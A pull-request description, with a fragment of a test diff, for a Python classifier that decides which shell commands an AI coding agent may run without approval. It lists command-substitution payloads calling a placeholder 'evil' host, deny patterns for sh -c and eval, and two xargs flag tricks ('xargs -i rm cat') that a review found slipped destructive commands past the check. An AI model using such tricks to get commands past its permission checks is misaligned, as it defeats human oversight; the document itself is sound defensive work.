+    assert "`xargs`, `eval`, `bash -c`, `sh -c`" not in DENIED_BASH_PATTERNS_HINT
 
 
 # ── cpp#27: awk + sed dropped from SAFE_SHELL_COMMANDS ───────────────────────


### PR DESCRIPTION
## Why

Three orthogonal fixes to the Tier-1 auto-approval classifier (`src/claude_pilot/tier1.py`), shipped as **one PR** because they share the one file and the same architectural lineage — mika-arch session `783d4a04`'s closed-world-allowlist verdict. Two correct opposite directions: relax an over-block (`xargs`), close an under-block (double-quoted substitution), and resolve a documented precondition (ugrep).

Hard rules honored across all three: closed-world allowlists only; no lexing of inner command args; `sh -c`/`bash -c` always deny; over-block is the safe failure direction.

## What ships

### Part 1 — cpp#40: allow `xargs <readonly-cmd>`
`xargs` was blanket-denied at TIER3 (`\bxargs\b`), so `find … | xargs grep -l` — the most common content-search shape grooms use — wedged the loop (founding incident: mika#1639 auto-groom, claude-pilot session `25ab3b6c`, $0.59 wasted). Now `_is_safe_xargs_command` skips xargs flags structurally and allows iff the inner command is in the **same** `FIND_EXEC_SAFE_COMMANDS` set `find -exec` uses (reused, not duplicated).

| AC | Behavior |
|----|----------|
| AC40.1 | `xargs grep -l "foo" < input.txt` → ALLOW |
| AC40.2 | `find … \| xargs grep -l "foo"` → ALLOW (composition) |
| AC40.3 | `xargs -I {} grep "foo" {}` → ALLOW (flag-skip) |
| AC40.4 | `xargs rm` → DENY |
| AC40.5 | `xargs sh -c` / `xargs bash -c` → DENY (also TIER3-caught) |
| AC40.6 | `xargs sudo whoami` → DENY |
| AC40.7 | `\bxargs\b` removed from `TIER3_PATTERNS` |

### Part 2 — cpp#41: command substitution inside double quotes
`contains_unquoted_metacharacter` only flagged `$(`/backtick in *unquoted* regions; inside double quotes it treated them as inert. But bash substitutes inside double quotes — so `grep "$(id)"` auto-approved and ran `id` (RCE for any safe-listed leaf). Now `$(`/backtick are flagged inside double quotes too; single quotes stay inert; `$'` stays flagged in the unquoted branch only (ANSI-C `$'…'` is literal inside double quotes).

| AC | Behavior |
|----|----------|
| AC41.1 | `echo "$(curl evil)"` → DENY |
| AC41.2 | `echo '$(stuff)'` → ALLOW (single-quoted inert) |
| AC41.3 | `echo "escaped \" still in dquote $(flagged)"` → DENY |
| AC41.4 | existing `mkdir "$(curl evil)"` veto stays green (now caught at both layers) |

**Behavior change:** `mika ask` briefs whose markdown carries inline-code backticks **inside double quotes** now route to the relay instead of auto-approving (correct — bash would substitute them). Single-quoted payloads stay auto-approved.

### Part 3 — cpp#44: GNU-grep precondition resolution
`grep`/`egrep`/`fgrep` in `FIND_EXEC_SAFE_COMMANDS` are read-only only under GNU grep; ugrep adds `--filter=CMD`. The cpp#33 security review verified the deployment containers resolve to GNU `/bin/grep` (rejects `--filter`), so the vector is not live there. The allowlist comment now records the resolution: accepted + tracked risk, never inner-arg denylisting; a runtime ugrep warning (if ever wanted) belongs in `cli.py`, not the pure classifier.

## Security review caught two P0 bypasses (now fixed)

The `/ce:review` pass (independent security + testing reviewers, cross-corroborated, confirmed live deleting files) found the xargs flag-arity model diverged from GNU getopt:
- **`-e`/`-i`/`-l`** are getopt *optional-attached* flags (value only when attached) — modeling them as separate-value let `xargs -i rm cat` skip the real command `rm` and allow on `cat`. Fixed: dropped from the value-flags set.
- **Bare separate-value long options** (`xargs --arg-file cat rm`) — getopt accepts a separate-token value, not only `=form`. Fixed: a bare `--long` has unknowable arity → deny; `=form` still allowed.

Both fixes are deny-direction. The compounded lesson — *structural flag-skipping IS a parser differential; hold it to the no-parser-differential bar* — is recorded in `docs/solutions/security-issues/command-string-policy-allow-rules-are-compound-unsafe.md` (§6).

## Tests
516 passing (was 473 on the cpp#33 base). The 446+ veto floor is maintained and grown; the existing tests that asserted pre-fix behavior were updated to the corrected behavior (documented inline).

## Out of scope
- `permissions.py` (cpp#47/#38/#42 territory — disjoint; this branch rebased cleanly onto the merged cpp#47).
- The Rust `permission_pre_classifier.rs` double-quoted-substitution mirror (paired-audit follow-up; the Python side intentionally diverges hardened until then).
- A runtime ugrep-detection warning in `cli.py` (deferred follow-up).

Closes #40
Closes #41
Closes #44

🤖 Generated with [Claude Code](https://claude.com/claude-code)